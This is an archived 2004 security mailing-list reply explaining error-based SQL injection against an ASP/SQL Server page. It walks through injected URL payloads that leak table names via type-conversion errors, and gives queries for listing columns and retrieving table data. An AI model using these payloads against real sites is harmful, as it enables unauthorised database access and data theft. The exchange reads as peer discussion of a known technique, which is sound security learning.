WebApp Sec mailing list archives
Re: SQL Injection data retrieving??
From: Jonathan Angliss <jon () netdork net>
Date: Fri, 10 Sep 2004 14:31:11 -0500
Hi Roland, Friday, September 10, 2004, 7:06:56 AM, you wrote:
First I've sent this URL:
www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' order by asc))
And I've goot the following error:
Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__big_field' to a column of data type int. /products.asp, line 32
You got that error because name is described as type sysname, which according to that error is a type of nvarchar. Unless it's obviously a numeric in a string, using convert will fail, for example: convert(int, '123') That'll work convert(int , 'abc') That'll fail. Unless getting it to generate such an error is part of your plan.
I assume that "__big_field" is the name of the databse? Right?
I believe that's a table name, not a database name. I believe the database names are stored under the master database in a table called sysdatabases.
Secondly I've sent the the following URL in order to get the table name:
www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' and name>'__big_field' order by 1 asc))
Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__dellist' to a column of data type int. /products.asp, line 32
Again, you're attempting to convert an nvarchar to an integer.
So "__dellist" is a table from the "__big_field" database? Right?
No, just another table in the same database, your where clause is telling the query to ignore the table __big_field, so it just grabs the next one down.
Now here comes the troubles... I would like to retrieve the columns name of the "__dellist" table and the data of the "__dellist".
select id from sysobjects where name = '__dellist' That'll get you the table id. Then: select name from syscolumns where id = [id from above query] That'll get you the column names. Or you can use a single query: select c.name from syscolumns as c inner join sysobjects as o on o.id = c.id where o.name = '__dellist'
I've sent:
www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))
Error Type: Microsoft OLE DB Provider for SQL Server (0x80004005) Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression. /products.asp, line 32
You're issuing a convert on a number of fields, I don't think SQL likes that very much.
My question is: Which query should I sent i order to retrieve the data of the table??
select * from __dellist The problem is, if the script isn't designed to handle the output from __dellist, it might not be of any use doing half of this as you cannot see the output, thought the page might generate a bunch of errors. -- Jonathan Angliss (jon () netdork net) I before E except after C, huh? Weird.....
Current thread:
- SQL Injection data retrieving?? Roland Despins (Sep 10)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 11)
- Re: SQL Injection data retrieving?? saphyr (Sep 12)
- Re: SQL Injection data retrieving?? nummish (Sep 11)
- Re: SQL Injection data retrieving?? Ben Timby (Sep 11)
- Re: SQL Injection data retrieving?? Adam Tuliper (Sep 11)
- Re: SQL Injection data retrieving?? Adam Tuliper (Sep 12)
- Re: SQL Injection data retrieving?? saphyr (Sep 12)
- <Possible follow-ups>
- Re: SQL Injection data retrieving?? Roland Despins (Sep 12)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 13)
- RE: SQL Injection data retrieving?? Mark McDonald (Sep 13)
- Re: SQL Injection data retrieving?? Roland Despins (Sep 13)
(Thread continues...)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 11)